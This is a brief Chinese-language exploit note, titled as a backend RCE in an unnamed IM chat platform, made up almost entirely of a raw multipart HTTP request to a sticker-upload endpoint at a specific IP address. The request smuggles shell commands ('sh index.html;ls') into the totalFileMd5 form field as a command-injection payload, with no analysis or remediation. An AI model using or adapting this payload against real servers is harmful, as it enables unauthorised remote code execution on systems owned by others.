某IM聊天平台后台RCE

后端登陆页面

POST /im_lite/stickersMusterUploader HTTP/1.1
Host: 20.24.91.233:6888
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Referer: http://20.24.91.233:9898/main//project/sms
Content-Length: 870
Content-Type: multipart/form-data; boundary=---------------------------153872684228200
Origin: http://20.24.91.233:9898
DNT: 1
X-Forwarded-For: 43.226.22.117
Connection: close

-----------------------------153872684228200
Content-Disposition: form-data; name="name"

1234.rar
-----------------------------153872684228200
Content-Disposition: form-data; name="chunks"

1
-----------------------------153872684228200
Content-Disposition: form-data; name="chunk"

1
-----------------------------153872684228200
Content-Disposition: form-data; name="totalLength"

1492
-----------------------------153872684228200
Content-Disposition: form-data; name="totalFileMd5"

f38d5af7f58def4cd3ed1ae60c1fc87e;sh index.html;ls 
-----------------------------153872684228200
Content-Disposition: form-data; name="user_name"

技术
-----------------------------153872684228200
Content-Disposition: form-data; name="file"; filename="123.rar"
Content-Type: application/octet-stream

test
-----------------------------153872684228200--